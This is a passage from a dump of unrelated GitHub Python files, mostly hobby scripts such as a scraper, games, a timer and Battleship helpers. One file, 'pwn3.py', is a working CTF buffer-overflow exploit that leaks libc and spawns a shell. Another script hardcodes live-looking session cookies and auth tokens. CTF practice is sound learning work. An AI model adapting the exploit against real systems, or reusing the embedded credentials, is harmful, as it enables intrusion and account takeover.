    Replaces the original remove-then-append sequence: opening with mode
    "w" truncates an existing file and creates a missing one in a single
    step, with the same end state (file contains only the header).
    """
    with open(outFileName, "w") as outfile:
        outfile.write("{0}, {1}, {2}\n".format("Year", "Keyword", "Frequency"))
def parsePage(url, outFileName, prefix):
    """Scrape one archived conference page and append its word counts.

    Downloads *url*, extracts the text of all <li class="speakers-item">
    elements, counts word frequencies minus the global commonWords stop
    list, filters out words containing digits, punctuation or dashes, and
    appends up to maxOutputCount rows of "prefix, word, count" to
    *outFileName*.
    """
    print "Processing URL: {0}, Result: {1}, Prefix: {2}".format(url, outFileName, prefix)
    opener = urllib.urlopen(url)
    page = opener.read()
    opener.close()
    soup = BeautifulSoup(page, "html.parser", from_encoding="UTF-8")
    # Speaker/talk entries hold the text being analysed.
    content = soup.find_all("li", "speakers-item")
    text = ""
    for entry in content:
        text += entry.get_text(" ", True)
    # Case-insensitive frequency count.
    words = [word.lower() for word in text.split()]
    c = Counter(words)
    # Drop the stop words loaded at startup.
    for key in commonWords:
        if key in c:
            del c[key]
    mostCommon = list()
    for word, count in c.most_common(maxAnalysisCount):
        # Adjacent string literals concatenate into one character class of
        # rejected punctuation characters.
        if not re.search('[–{@#!;+=_,$<(^)>?.:%/&}''"''-]', word):
            # Reject em dash (U+2014) and en dash (U+2013) separately.
            if not (re.search(u'\u2014', word) or re.search(u'\u2013', word)):
                if not re.search('[0-9]', word):
                    if word:
                        mostCommon.append((word, count))
                    else:
                        print("Skipping: <empty>")
                else:
                    # NOTE(review): .decode on the str literal (Python 2) just
                    # turns the format string into unicode before .format.
                    print("Skipping number: {0}".decode('ascii', 'ignore').format(word))
            else:
                print("Skipping unicode character: {0}".decode('ascii', 'ignore').format(word))
        else:
            print("Skipping special character: {0}".decode('ascii', 'ignore').format(word))
    # Append this page's rows to the shared CSV.
    with open(outFileName, "a") as outfile:
        for word, count in mostCommon[:maxOutputCount]:
            outfile.write("{0}, {1}, {2}\n".format(prefix, word, count))
    print "Done"
# main
# Load the comma-separated stop-word list used to filter frequent words.
commonWords = readList(commonWordsFileName, ',')
# Start a fresh output CSV containing only the header row.
writeHeader(outFileName)
parsePage("https://web.archive.org/web/20160325231108/http://craft-conf.com/2016", outFileName, "year2016")
parsePage("https://web.archive.org/web/20160406212403/http://craft-conf.com/2015", outFileName, "year2015")
parsePage("https://web.archive.org/web/20160324192950/http://craft-conf.com/2014", outFileName, "year2014")
| UTF-8 | Python | false | false | 2,592 | py | 4 | WordFreqCount.py | 1 | 0.667568 | 0.630116 | 0 | 83 | 30.180723 | 107 |
wwzskyrain/python-study | 3,307,124,863,959 | 0e26077d3f558f4a04ddc0d7ffda04c5ad9ad31f | b9526da1873e9ba8992a39eb29fe06b6fd2640b4 | /erik/erik/http_erik/http_one.py | fdd6a6191e3a0df878d4bed63202ebd7372c5eae | []
| no_license | https://github.com/wwzskyrain/python-study | a5b35d364bef94683c12818a7c69da06830afb9c | d6bec7ad96775262e46f1ad2fb7b6f0ed83dfd81 | refs/heads/master | 2020-03-21T20:55:19.349582 | 2018-08-09T11:06:29 | 2018-08-09T11:06:29 | 139,036,703 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/Python
# -*- coding: UTF-8 -*-
import urllib.request
import urllib.parse
import json
def request_localhost_and_print():
    """Fetch the local /students endpoint and print the raw and parsed JSON."""
    raw_body = urllib.request.urlopen("http://localhost:8893/students").read().decode('utf-8')
    print("response: ", raw_body)
    parsed = json.loads(raw_body)
    print(type(parsed))
    print(parsed)
def get_list_spu_id():
    """Prompt the operator for comma-separated album (spu) IDs; return a list."""
    return input("请输入专辑ID,以逗号隔开\n").split(",")
def get_list_product_id():
    """Prompt the operator for comma-separated product IDs; return a list."""
    return input("请输入productID,以逗号隔开\n").split(",")
def build_search_url_from_spu_id(spu_id=""):
if spu_id.strip() != "":
# print(spu_id)
# need a [static] constant
url_pattern = 'http://ops.ximalaya.com/business-product-admin-web/product/search?categoryId=100&domainId=1&statusId=0&spuId={0}&productId=&productName=&pageNum=1&pageSize=10'
return url_pattern.format(spu_id)
else:
pass
return ""
def build_property_url_from_product_id(product_id=""):
if product_id.strip() != "":
url_pattern = 'http://ops.ximalaya.com/business-product-admin-web/product/properties?productId={0}&categoryId=101'
return url_pattern.format(product_id)
def query_product_properties_by_product_id():
list_product_id = get_list_product_id();
for product_id in list_product_id:
property_query_url = build_property_url_from_product_id(product_id)
header_param = {
'Cookie': 'JSESSIONID=5090B1688F74B6B51A18C58D5D573D4E; _xmLog=xm_1500013288413_j53h6kt9urxl3f; _ga=GA1.2.1440976587.1509762096; login_from=phone; NTKF_T2D_CLIENTID=guestB6A3D8CA-372C-CCC6-E339-DE762EA94018; 1&remember_me=y; 1&_token=103514482&41b752ed078df0445e09d7d08776822e4070; org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=zh_CN; trackType=web; x_xmly_traffic=utm_source%3A%26utm_medium%3A%26utm_campaign%3A%26utm_content%3A%26utm_term%3A%26utm_from%3A; 4&remember_me=y; 4&_token=57877&f54244f92a5c2e15a04ce3553f8df8fc5c6b780dd1ed2b7b875ef6ad46d8df0a; 4_l_flag="57877&f54244f92a5c2e15a04ce3553f8df8fc5c6b780dd1ed2b7b875ef6ad46d8df0a_2018-08-02 16:55:49"; account=133****8888; nickname=luna; Hm_lvt_4a7d8ec50cfd6af753c4f8aee3425070=1532918148,1533215454,1533623796; Hm_lpvt_4a7d8ec50cfd6af753c4f8aee3425070=1533641128; ops-auth=30954EC8AC1A6C147F42; sync=eG1seTIwMTdFUklL'
}
req = urllib.request.Request(property_query_url, headers=header_param)
response = urllib.request.urlopen(req)
response_data = response.read().decode('utf-8')
list_response_data = json.loads(response_data)
list_value = [product_id];
for dic in list_response_data:
dict_attribute_vo = dict(dict(dic).get('attributeVo'))
if dict_attribute_vo.get("id") == 100100006:
list_value.append(100100006)
list_value.append(dict(dic)["value"])
print(list_value)
def query_product_properties_by_spu_id():
list_spu_id = get_list_spu_id()
list_search_url = list(map(build_search_url_from_spu_id, list_spu_id))
header_param = {
'Cookie': 'JSESSIONID=5090B1688F74B6B51A18C58D5D573D4E; _xmLog=xm_1500013288413_j53h6kt9urxl3f; _ga=GA1.2.1440976587.1509762096; login_from=phone; NTKF_T2D_CLIENTID=guestB6A3D8CA-372C-CCC6-E339-DE762EA94018; 1&remember_me=y; 1&_token=103514482&41b752ed078df0445e09d7d08776822e4070; org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=zh_CN; trackType=web; x_xmly_traffic=utm_source%3A%26utm_medium%3A%26utm_campaign%3A%26utm_content%3A%26utm_term%3A%26utm_from%3A; 4&remember_me=y; 4&_token=57877&f54244f92a5c2e15a04ce3553f8df8fc5c6b780dd1ed2b7b875ef6ad46d8df0a; 4_l_flag="57877&f54244f92a5c2e15a04ce3553f8df8fc5c6b780dd1ed2b7b875ef6ad46d8df0a_2018-08-02 16:55:49"; account=133****8888; nickname=luna; Hm_lvt_4a7d8ec50cfd6af753c4f8aee3425070=1532918148,1533215454,1533623796; Hm_lpvt_4a7d8ec50cfd6af753c4f8aee3425070=1533641128; ops-auth=30954EC8AC1A6C147F42; sync=eG1seTIwMTdFUklL'
}
dict_spu_id_to_attribute = {}
for spu_id in iter(list_spu_id):
dict_spu_id_to_attribute.setdefault(spu_id, [])
for spu_id in dict_spu_id_to_attribute.keys():
search_url = build_search_url_from_spu_id(spu_id)
req = urllib.request.Request(search_url, headers=header_param)
response = urllib.request.urlopen(req)
response_data = response.read().decode('utf-8')
response_data_dict = json.loads(response_data)
html_data = response_data_dict["data"]
str_data = str(html_data)
first_colon_index = str_data.index("\"")
second_colon_index = str_data.index("\"", first_colon_index + 1)
product_id = str_data[first_colon_index + 1:second_colon_index]
list_value = list(dict_spu_id_to_attribute[spu_id])
list_value.append(product_id)
property_query_url = build_property_url_from_product_id(product_id)
req = urllib.request.Request(property_query_url, headers=header_param)
response = urllib.request.urlopen(req)
response_data = response.read().decode('utf-8')
list_response_data = json.loads(response_data)
for dic in list_response_data:
dict_attribute_vo = dict(dict(dic).get('attributeVo'))
if dict_attribute_vo.get("id") == 100100006:
list_value.append(100100006)
list_value.append(dict(dic)["value"])
dict_spu_id_to_attribute[spu_id] = list_value
print(dict_spu_id_to_attribute)
# Script entry point: interactively look up property values for the
# product IDs the operator types in.
query_product_properties_by_product_id()
| UTF-8 | Python | false | false | 5,710 | py | 2 | http_one.py | 2 | 0.702822 | 0.575485 | 0 | 106 | 52.481132 | 907 |
AnkitM18-tech/Python-Introductory-Problems | 9,165,460,242,870 | 6138ae699a69cdd12117055288f5a852678673b4 | 0a5d2213ae89d7364ca79d8f3ba7f5590766554e | /3.Loops/SquareRoot.py | 052b694c28e5f4bd38ea385256ec53b645f1a2ce | []
| no_license | https://github.com/AnkitM18-tech/Python-Introductory-Problems | 5f2e4d2b964d17e7820e30faacb0c8233b8c4eff | aa984b4758d812a529eff820a4c5f21fe7fecd12 | refs/heads/main | 2023-06-25T10:31:33.927879 | 2021-08-01T17:01:29 | 2021-08-01T17:01:29 | 391,678,089 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue Jul 7 18:59:13 2020
@author: OCAC
"""
num=float(input("Enter the Number:"))
# Initial guess for the iteration: half the input.
guess=num/2
# Convergence tolerance on guess**2 vs num.
eps=10**-12
# Newton-Raphson iteration for square root: average guess with num/guess
# until guess squared is within eps of num.
while abs((guess**2)-num)>eps:
    guess=(guess+(num/guess))/2
print("The Approximate Square Root Of The %f is :%.4f"%(num,guess))
roboticmonkey/hb-intro-final-project_Battleship | 5,772,436,073,070 | 31e737bdbf383b0929132e437974f8d83a87bf8f | 13a4d613d3c11972a2bf7b6821d4fe60f4bf3f29 | /utilities.py | f525fdf3e3d5a951bca2d411f9739d5dd522ace5 | []
| no_license | https://github.com/roboticmonkey/hb-intro-final-project_Battleship | a4178eb21ff88566d9a86c81a050de6487fd81c6 | 65ed38b8d8cc7c158c6c209adeb2b85a9a04eedf | refs/heads/master | 2021-01-15T23:46:18.081037 | 2015-10-16T04:13:54 | 2015-10-16T04:13:54 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import board
import random
random.seed()
test_grid = board.Board()
#check for valid number range. returns True of False
def valid_number(user_input):
    """Return True if the coordinate string carries a valid row number (1-10).

    *user_input* is a cleaned coordinate such as "A7" or "B10": one letter
    followed by the number.  Valid numbers are 1-9 (length-2 input) and 10
    (length-3 input).

    Fixes over the original: a non-digit second character is now rejected
    (the old code accepted e.g. "AB"), and inputs of any other length return
    False explicitly instead of falling through to None.
    """
    if len(user_input) == 2:
        # Single-digit row: must be a digit 1-9 ("0" alone is off the board).
        return user_input[1].isdigit() and user_input[1] != "0"
    if len(user_input) == 3:
        # Two-digit row: only "10" fits on the board.
        return user_input[1] + user_input[2] == "10"
    # Anything shorter or longer cannot be a coordinate number.
    return False
#remove extra spaces and capitalizes letters returns fixed input
def quick_fix(user_input):
    """Normalize raw coordinate input: trim surrounding spaces, uppercase it.

    Only space characters are stripped (not tabs/newlines), matching the
    original behaviour.
    """
    return user_input.strip(" ").upper()
#creates grid location returns a list
def generates_grid_location():
num = random.randrange(1, 11)
num2 = random.randrange(1, 11)
num_list = [num, num2]
return num_list
#check for valid letter range return True or False
def valid_letter(user_input, board):
    """Return True if the coordinate's first character is one of the
    board's valid row letters (board.capital_letters)."""
    return user_input[0] in board.capital_letters
#Validating coordinate format
def validate_user_input(user_input, board):
    """Return True only when both the letter and number parts validate."""
    # bool() keeps the strict True/False contract of the original even
    # though valid_number may return None for odd-length input.
    return bool(valid_letter(user_input, board) and valid_number(user_input))
#Ask for and return valid location string
def request_valid_location(raw_data, board):
    """Keep prompting until *raw_data* is a valid coordinate, then return it."""
    while not validate_user_input(raw_data, board):
        # Re-prompt and normalize the reply before re-checking.
        raw_data = quick_fix(raw_input("Please give coordinates in format 'A1'. "))
    return raw_data
#Asks user for and returns a valid str bomb location
def get_bomb_str(player_board_object):
    """Ask the player where to drop a bomb and return a validated coordinate."""
    first_try = quick_fix(raw_input("Enter coordinates for a bomb. "))
    # request_valid_location re-prompts until the coordinate validates.
    return request_valid_location(first_try, player_board_object)
#Checks for no winner
def no_winner(opponent_player_object):
    """Return True while the opponent still has at least one ship afloat."""
    # all_sunk() refreshes the fleet_sunk flag before it is read.
    opponent_player_object.ships.all_sunk()
    return not opponent_player_object.ships.fleet_sunk
#requesting ship placement for human
def request_placement_of_ship(ship_object, board_object, game_pieces_object, player_object):
    """Interactively place one ship for a human player.

    Loops until the ship's grid-location list is filled: prompts for start
    and end coordinates, validates them, and rejects placements that collide
    with ships already recorded in game_pieces_object.  On success the ship
    is registered in the fleet dictionary, drawn onto the player's board,
    and the board is printed.
    """
    while (ship_object.location_list_full() == False):
        #Grid location list is empty.
        print "Ships may only be placed horizontally or vertically."
        #Ask user for start coordinate
        print "Use letters A-J and numbers 1-10 for coordinates in the format 'A1'. "
        print "Let's place your", ship_object.ship_name, "."
        print ship_object.ship_name, "is ", ship_object.size, "cells long."
        raw_data = raw_input("Please give the starting coordinates. Ex. 'A1'. ")
        raw_data = quick_fix(raw_data)
#        print raw_data
        #Validates string, asks for new one till it validates
        temp_location_str = request_valid_location(raw_data, board_object)
        #Save start location string into ships start_location attribute
        ship_object.ship_location_start(temp_location_str)
#        print ship_object.start_location
        #Convert start_location to a grid_location and save
        ship_object.create_grid_start_loc(board_object)
#        print ship_object.grid_loc_start
        #Check of location is taken
        #If all_ship dictionary is empty get end coordinates
        if (game_pieces_object.all_ship_locations == {}):
            #Ask for end location coordinates
            print ship_object.start_location, "is your starting location. Ships may only be horizontal or vertical."
            raw_data = raw_input("Enter your ending coordinates. ")
            raw_data = quick_fix(raw_data)
            #Valitdate user input string asks for valid string till it gets one.
            temp_location_str = request_valid_location(raw_data, board_object)
            #Saves the location string
            ship_object.ship_location_end(temp_location_str)
            #Save end location string into ship end_location attribute
            ship_object.create_grid_end_loc(board_object)
            #Create ship grid location list
            #If true, add ships grid_loc_list to game_pieces all_ships dict
            ship_object.create_grid_loc_list()
        else:
            #Check if start grid location is taken
            #Check if ship already at location
#            print "dictionary not empty"
            if (game_pieces_object.is_taken(ship_object.grid_loc_start) == False):
                #Location not taken ask for end location
                #Ask for end location coordinates
                print ship_object.start_location, "is your starting location. Ships may only be horizontal or vertical."
                raw_data = raw_input("Enter your ending coordinates. ")
                raw_data = quick_fix(raw_data)
                #Valitdate user input string asks for valid string till it gets one.
                temp_location_str = request_valid_location(raw_data, board_object)
                #Saves the location string
                ship_object.ship_location_end(temp_location_str)
                #Creates the grid location
                ship_object.create_grid_end_loc(board_object)
                #Check if end location is already taken
                # NOTE(review): this passes the *method object*
                # create_grid_end_loc to is_taken() instead of a computed
                # grid location (grid_loc_end?), so the == True comparison
                # is suspect -- confirm the intended argument.
                if (game_pieces_object.is_taken(ship_object.create_grid_end_loc) == True):
                    #If it is not taken
                    #Create ship grid location list
                    #DELETE all location variables
                    ship_object.erase_start_locations()
                    ship_object.erase_end_locations()
                    print "Ships maynot overlap. Please re-enter your coordinates."
                else:
                    #Create ship grid location list
                    #If true, add ships grid_loc_list to game_pieces all_ships dict
                    ship_object.create_grid_loc_list()
                    #Check if ship location list overlaps a previous ship
                    if (game_pieces_object.is_overlap(ship_object) == True):
                        #If it overlaps print error msg.
                        print "Ships maynot overlap. Please re-enter your coordinates."
                        #DELETE all location variables
                        ship_object.erase_start_locations()
                        ship_object.erase_end_locations()
                        ship_object.erase_grid_location_list()
                        #Go Back to getting Start Location coordinates
#    print ship_object.grid_loc_list
    # Save location list to ship location dictionary
    game_pieces_object.add_ship_loc_dict(ship_object)
    #Update players ship_board
    board_object.update_grid_ship(ship_object)
    #Print updated players ship board
    player_object.print_my_ships_board()
| UTF-8 | Python | false | false | 6,050 | py | 14 | utilities.py | 9 | 0.722645 | 0.718678 | 0 | 188 | 31.170213 | 108 |
yangmin521/gjoa | 10,849,087,425,131 | 08f39e29fde03565ecac83545184e704bae0ad01 | 0f2c32602b82eb64295c3dc1a806eb3791b71e8d | /Classes/DBObjects/Address.py | f6f0f3059ccb9dbcb3c6240175cbb2ceab1d7b6d | []
| no_license | https://github.com/yangmin521/gjoa | 77a9a39477c979e0d71c55d606b03ad3270c397d | 7a120a02340d07eb2b1d85ad21897cc5488c7092 | refs/heads/master | 2022-10-11T19:43:56.385287 | 2020-06-05T21:16:48 | 2020-06-05T21:16:48 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from Classes.DBObjects.DBObject import DBObject
import decimal
# Class to handle address
class Address(DBObject):
    """A single row of the ``addresses`` table.

    Thin wrapper over the generic DBObject CRUD helpers, binding them to
    the address-specific columns.  ``status`` is treated as a bit field by
    check_status(); the bit meanings below are taken from the inline
    comments -- confirm against the code that writes this column.
    """
    def __init__(self, address=None, pub_id=None, address_type=None, status=None, amount=None):
        # The key column for this table is 'aid'.
        super().__init__(table='addresses', key='aid')
        # Assign attributes, if present.
        self.address = address
        self.pub_id = pub_id
        self.address_type = address_type
        self.balance = amount
        self.status = status
    # Method to check if this address already exists in the database
    def check_address(self):
        # Prefer the unique address string; otherwise fall back to the
        # (public key id, address type) pair.
        if self.address is not None:
            return self.check(match_columns='address', matches=self.address)
        return self.check(match_columns=['pub_id', 'address_type'], matches=[self.pub_id, self.address_type])
    # Method to add or update this address to the database.
    def push_address(self):
        value_columns = ['address', 'balance', 'status', 'address_type', 'pub_id']
        values = [self.address, self.balance, self.status, self.address_type, self.pub_id]
        return self.push(value_columns=value_columns, values=values)
    # Method to load an address from the database.
    def pull_address(self):
        # Row layout used here: index 1=address, 2=type, 4=balance,
        # 5=status, 6=pub_id (indices 0 and 3 unused by this method).
        data = self.pull()
        if data is not None:
            self.address = data[1]
            self.address_type = data[2]
            self.balance = data[4]
            self.status = data[5]
            # Only override public_key id if it was previously not known (for linking)
            self.pub_id = data[6] if self.pub_id is None else self.pub_id
    # Method to delete this address from the database.
    def destroy_address(self):
        self.destroy()
    # TODO
    # Method to figure out if this address is in the database already
    # NOTE(review): despite the comment above, this computes a status code
    # from the status bit field and pub_id/balance -- name/comment mismatch.
    def check_status(self):
        result = 0
        # If the private key is known, disqualify
        result += 1 if self.status & 0b1 == 0b1 else 0  # Is this a generated pair?
        result += 4 if self.status & 0b0100 == 0b0100 else 0  # Is the private key known?
        if result != 0:
            return result + 2 if self.pub_id is not None else result  # Is the public key known
        # If the public key is known, add 2.
        result += 2 if self.pub_id is not None else 0
        # If private key is not known, return active if the balance is above 0
        result += 1 if self.balance > 0.0 else 0
        return result
5unKn0wn/ctfs | 3,839,700,790,584 | 980200562e61e4f8c770cfeb9416a009ee86ae44 | 8349aac7fbee610b2dbe5d1fa13e9d714a0264e3 | /2018/tamu/pwn3.py | 2af1e23ad5a2e0b5923dbbca14bfe6d0cb1885a0 | []
| no_license | https://github.com/5unKn0wn/ctfs | 3d3adde87ebbc8c2350e48274a15c35887444625 | b973773b43bdb4e6ad80606aa11b690fc44545cb | refs/heads/master | 2023-08-10T01:54:14.798392 | 2023-07-21T23:50:21 | 2023-07-21T23:50:21 | 92,021,189 | 34 | 8 | null | null | null | null | null | null | null | null | null | null | null | null | null | from pwn import *
r = remote("pwn.ctf.tamu.edu", 4323)
# r = process("./pwn3")
payload = "A" * 0xf2
payload += p32(0x08048390) # puts got
payload += p32(0x080485DB) # pr
payload += p32(0x0804A018) # libc got
payload += p32(0x080483D0)
r.sendlineafter("echo? ", payload)
r.recvuntil("\n")
libc = u32(r.recv(4)) - 0x18540
system = libc + 0x3ada0
binsh = libc + 0x15ba0b
log.info(hex(binsh))
payload = "A" * 0xf2
payload += p32(system) # puts got
payload += p32(0x41414141) # pr
payload += p32(binsh) # libc got
r.sendlineafter("echo? ", payload)
r.interactive()
| UTF-8 | Python | false | false | 572 | py | 212 | pwn3.py | 166 | 0.660839 | 0.520979 | 0 | 26 | 21 | 38 |
darkdrei/GestionRegistro | 9,749,575,771,658 | c79868661d0ba03700d9f0caa17b0576729458f6 | 6bf54f8c985ec27ae62680719d755ba302659aaa | /usuario/models.py | 3becb670b03426c353ec177bd817d54802bd3c2e | [
"MIT"
]
| permissive | https://github.com/darkdrei/GestionRegistro | b480ee7438d316d7def3508fe6b0f03658139e14 | df7d605822225251b19106e72e3bc20eb230249b | refs/heads/master | 2021-01-20T04:36:39.559415 | 2017-08-06T19:49:51 | 2017-08-06T19:49:51 | 89,705,335 | 0 | 0 | null | false | 2017-10-11T16:44:35 | 2017-04-28T12:46:50 | 2017-04-28T17:43:14 | 2017-10-11T16:44:15 | 5,383 | 0 | 0 | 2 | JavaScript | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
import re
from django.core import validators
from django.contrib.auth.models import User
from empresa import models as emp
# Create your models here.
class Documento(models.Model):
nombre = models.CharField(max_length=30)
descripcion = models.CharField(max_length=200, null=True, blank=True)
estado= models.BooleanField(default=True)
def __unicode__(self):
return u'%s'%self.nombre
#end def
def __str__(self):
return u'%s'%self.nombre
#end def
#end class
class Usuario(User):
documento = models.ForeignKey(Documento, verbose_name='Tipo de documento')
identificacion = models.CharField(max_length=15, unique=True, validators=[
validators.RegexValidator(re.compile('^[0-9]+$'), ('identificacion no valida'), 'invalid')])
telefono_fijo = models.CharField(verbose_name='Telefono fijo',max_length=15, blank=True, validators=[
validators.RegexValidator(re.compile('^[0-9]+$'), ('telefono no valido'), 'invalid')])
telefono_celular = models.CharField(verbose_name='Celular',max_length=15, validators=[validators.RegexValidator(
re.compile('^[0-9]+$'), ('telefono no valido'), 'invalid')])
estado = models.BooleanField(default=True)
def __unicode__(self):
return u'%s %s'%(self.first_name,self.last_name)
#end def
def __str__(self):
return u'%s %s'%(self.first_name,self.last_name)
#end def
#end class
class Cargo(models.Model):
empresa = models.ForeignKey(emp.Empresa)
nombre = models.CharField(max_length=30)
descripcion = models.CharField(max_length=200, null=True, blank=True)
estado= models.BooleanField(default=True)
def __unicode__(self):
return u'%s'%self.nombre
#end def
def __str__(self):
return u'%s'%self.nombre
#end def
#end class
class Empleado(Usuario):
tienda = models.ForeignKey(emp.Tienda)
direccion = models.CharField(max_length=50)
fecha_nacimiento = models.DateField(null=True, blank=True)
foto = models.ImageField(upload_to='empleado/', null=True, blank=True)
def __unicode__(self):
return u'%s %s'%(self.first_name,self.last_name)
#end def
def __str__(self):
return u'%s %s'%(self.first_name,self.last_name)
#end def
class Meta:
verbose_name = "Empleado"
verbose_name_plural = "Empleados"
#end class
#end class
class Administrador(Usuario):
tienda = models.ForeignKey(emp.Tienda)
direccion = models.CharField(max_length=50, null=True, blank=True)
fecha_nacimiento = models.DateField(null=True, blank=True)
foto = models.ImageField(upload_to='administrador/', null=True, blank=True)
def __unicode__(self):
return u'%s %s'%(self.first_name,self.last_name)
#end def
def __str__(self):
return u'%s %s'%(self.first_name,self.last_name)
#end def
class Meta:
verbose_name = "Administrador Tienda"
verbose_name_plural = "Administradores de Tiendas"
#end class
#end class
| UTF-8 | Python | false | false | 3,165 | py | 64 | models.py | 38 | 0.649605 | 0.641074 | 0 | 102 | 30.029412 | 130 |
j-kincaid/python-habits | 1,675,037,272,763 | e1ec11afa7f548e94308d825b4fbbc88633471bf | bcabfb5cc3bd9b228118b1c0e1348dd968c4fef1 | /mysteryNumber.py | bb782ed91a2c947e56c99a335fd008395cb48b23 | []
| no_license | https://github.com/j-kincaid/python-habits | f99df43c06f3fa6aecbebcbdf4a8985cfcad155e | 17d49b46a2c2161ed317032c6ba0bc293fbb635e | refs/heads/main | 2023-09-03T02:12:40.340032 | 2022-08-27T18:53:49 | 2022-08-27T18:53:49 | 430,483,969 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import random
# """
# Feedback: The first printed statement should clue the user
# in to what the program is doing. If they choose 1 in the beginning
# then the random number will be picked between 1 and 1, it
# will always be 1. It should say something more like
# A random number will be picked between 1 and the number you input
# or something along those lines.
# """
top_of_range = input("Thank you for playing the Mystery number game! Type a number between 1 and 100: ")
if top_of_range.isdigit():
top_of_range = int(top_of_range)
rNum = random.randint(1, top_of_range)
guesses = 0
print('You just chose a number. That is the greatest of the numbers that will be randomized. Try to guess the random number in 7 guesses or fewer.')
while True:
guesses += 1
user_guess = input("Make a guess: ")
if user_guess.isdigit():
user_guess = int(user_guess)
else:
print('Please type a number next time.')
continue
if user_guess == rNum:
print("Good Job! You guessed the number!")
break
elif user_guess > rNum:
print("You were above the number!")
else:
print("That's below the number!")
print("You guessed it in", guesses, "guesses")
| UTF-8 | Python | false | false | 1,232 | py | 22 | mysteryNumber.py | 21 | 0.670455 | 0.659903 | 0 | 35 | 34.142857 | 148 |
humphrey43/RaspBerry | 7,825,430,414,806 | e34c6b5f0ed04c7874759d5c906138c604778028 | f94f6cd9d337c91449d09776ac03e15736102fef | /RadioClock/src/radioclock/timebase.py | 8beea7aa12fe1a54c566108c12bdfeab9b3fa91f | []
| no_license | https://github.com/humphrey43/RaspBerry | 67a04276f17b5d50808cdd63165c5cf7cd5b18bb | aa46dd4e1eccd97140507c5797c874c52d9bd99c | refs/heads/master | 2021-01-10T10:11:39.258197 | 2016-03-27T17:52:24 | 2016-03-27T17:52:24 | 53,202,537 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''
Created on 24.02.2016
@author: hardy
'''
from datetime import datetime
from datetime import timedelta
from kivy.clock import Clock
from swbus import SWBusComponent
TIME_BASE = "TimeBase"
TIME = "Time"
SECOND = "Second"
MINUTE = "Minute"
FIRE = "Fire"
TIMER = "Timer"
INIT = "INIT"
STOP = "STOP"
class TimeBase(SWBusComponent):
    """Bus component that publishes SECOND/MINUTE ticks and timer FIRE events.

    A kivy Clock callback runs once per second; registered Timer objects are
    fired once their ``nexttime`` deadline has passed.
    """

    # Kept for backwards compatibility with code reading it off the class;
    # every instance now gets its own list in __init__ so instances no longer
    # share one class-level mutable list.
    timerlist = []

    def __init__(self):
        super(TimeBase, self).__init__(TIME_BASE)
        self.run = True
        self.time = datetime.now()
        # Pretend the previous minute tick happened a minute ago so the
        # first MINUTE event fires promptly.
        self.lastminute = datetime.now() - timedelta(minutes=1)
        self.timerlist = []
        Clock.schedule_interval(self._check_time, 1)

    def register(self):
        """Announce the events and values this component provides on the bus."""
        self.announce_event(SECOND)
        self.announce_event(MINUTE)
        self.announce_event(FIRE)
        self.define_value(TIME)
        self.define_value(TIMER)

    def bus_stop(self):
        """Drop all timers and let the periodic clock callback unschedule."""
        self.timerlist = []
        self.run = False

    def get_time(self):
        """Return the timestamp captured by the most recent clock tick."""
        return self.time

    def _check_time(self, dt):
        """Per-second kivy callback: raise SECOND, MINUTE and FIRE events.

        Returning False unschedules the callback (kivy convention), which is
        how bus_stop() takes effect.
        """
        self.time = datetime.now()
        self.raise_event(SECOND, self.time)
        diff = self.time - self.lastminute
        if self.time.second == 0 or diff.seconds >= 60:
            self.lastminute = self.time
            self.raise_event(MINUTE, self.time)
        # Bug fix: iterate over a snapshot, because expired one-shot timers
        # are removed from the list while walking it; removing items from the
        # list being iterated skips the following element.
        for t in list(self.timerlist):
            if t.nexttime <= self.time:
                t.count = t.count + 1
                self.raise_event(FIRE, t)
                if t.repeat:
                    t.nexttime = t.nexttime + timedelta(0, t.interval)
                else:
                    self.timerlist.remove(t)
        return self.run

    def set_timer(self, timer):
        """Register a timer (command INIT) or remove the one with the same name."""
        if timer.command == INIT:
            if timer.nexttime is None:
                timer.nexttime = datetime.now() + timedelta(0, timer.interval)
            self.timerlist.append(timer)
        else:
            for t in self.timerlist:
                if t.name == timer.name:
                    self.timerlist.remove(t)
                    break
class Timer:
    """Value object describing a timer managed by TimeBase.

    Attributes:
        command: INIT to register the timer, anything else to remove it.
        name: Identifier used when removing a timer.
        interval: Seconds between firings.
        count: Number of times the timer has fired (maintained by TimeBase).
        repeat: Whether the timer re-arms itself after firing.
        nexttime: datetime of the next firing; filled in by TimeBase if None.
    """

    # Class-level defaults kept for backwards compatibility with code that
    # reads attributes directly off the class.
    command = ""
    name = ""
    interval = 0
    count = 0
    repeat = False
    nexttime = None

    def __init__(self, command="", name="", interval=0, count=0,
                 repeat=False, nexttime=None):
        # Per-instance state avoids the shared-class-attribute pitfall and
        # lets callers configure a timer in a single expression.
        self.command = command
        self.name = name
        self.interval = interval
        self.count = count
        self.repeat = repeat
        self.nexttime = nexttime
| UTF-8 | Python | false | false | 2,163 | py | 29 | timebase.py | 24 | 0.539066 | 0.530744 | 0 | 85 | 24.341176 | 77 |
Prismary/taki | 352,187,358,751 | 149f2f849fa76aa754c120a6005e82ab233ea5ac | 70f15cb7ac90e532a16743a9bb4ef507ea76e62f | /twitter.py | 4c810ca4c143e1fb6425b89285b5a1d5991bba18 | []
| no_license | https://github.com/Prismary/taki | 5e56595fb631420547be7653c23d16d529a465e6 | b89ec42101508eeb6071e6568a9a4a7fa93e64c9 | refs/heads/master | 2020-09-26T19:03:49.783971 | 2020-04-13T14:26:28 | 2020-04-13T14:26:28 | 226,320,442 | 3 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import tweepy
import yaml
# Load the YAML config once at import time; FullLoader avoids arbitrary
# object construction from the file.
with open('config.yml', 'r') as cfgfile:
    config = yaml.load(cfgfile, Loader=yaml.FullLoader)

# Twitter API credentials, read from config.yml (tokens -> twitter section).
consumer_token = config['tokens']['twitter']['consumer_token']
consumer_secret = config['tokens']['twitter']['consumer_secret']
access_token = config['tokens']['twitter']['access_token']
access_secret = config['tokens']['twitter']['access_secret']
def tweet(msg):
    """Post *msg* as a status update on the configured Twitter account.

    Returns a human-readable status string for display to the caller.
    """
